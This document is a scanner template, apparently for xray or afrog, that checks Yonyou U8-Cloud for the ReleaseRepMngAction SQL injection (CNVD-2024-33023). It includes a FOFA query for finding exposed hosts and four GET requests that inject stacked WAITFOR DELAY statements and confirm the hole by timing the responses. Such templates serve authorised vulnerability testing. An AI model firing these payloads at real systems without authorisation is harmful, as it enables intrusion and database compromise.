漏洞描述
Yonyou U8-Cloud ReleaseRepMngAction interface has a SQL injection vulnerability (CNVD-2024-33023).
The vulnerability allows attackers to execute arbitrary SQL statements through maliciously crafted requests.
FOFA: title=="U8C"
id: CNVD-2024-33023
info:
name: Yonyou U8-Cloud ReleaseRepMngAction SQL Injection
author: ZacharyZcR
severity: critical
verified: true
description: |
Yonyou U8-Cloud ReleaseRepMngAction interface has a SQL injection vulnerability (CNVD-2024-33023).
The vulnerability allows attackers to execute arbitrary SQL statements through maliciously crafted requests.
FOFA: title=="U8C"
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-Cloud%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3ReleaseRepMngAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CNVD-2024-33023).md
tags: cnvd,cnvd2024,yonyou,sqli
created: 2024/12/30
rules:
r0:
request:
method: GET
path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:10%27--
expression: |
response.status == 200 &&
response.body.ibcontains(b"iUFO") &&
response.latency <= 12000 &&
response.latency >= 10000
r1:
request:
method: GET
path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--
expression: |
response.status == 200 &&
response.body.ibcontains(b"iUFO") &&
response.latency <= 8000 &&
response.latency >= 6000
r2:
request:
method: GET
path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:10%27--
expression: |
response.status == 200 &&
response.body.ibcontains(b"iUFO") &&
response.latency <= 12000 &&
response.latency >= 10000
r3:
request:
method: GET
path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--
expression: |
response.status == 200 &&
response.body.ibcontains(b"iUFO") &&
response.latency <= 8000 &&
response.latency >= 6000
expression: r0() && r1() && r2() && r3()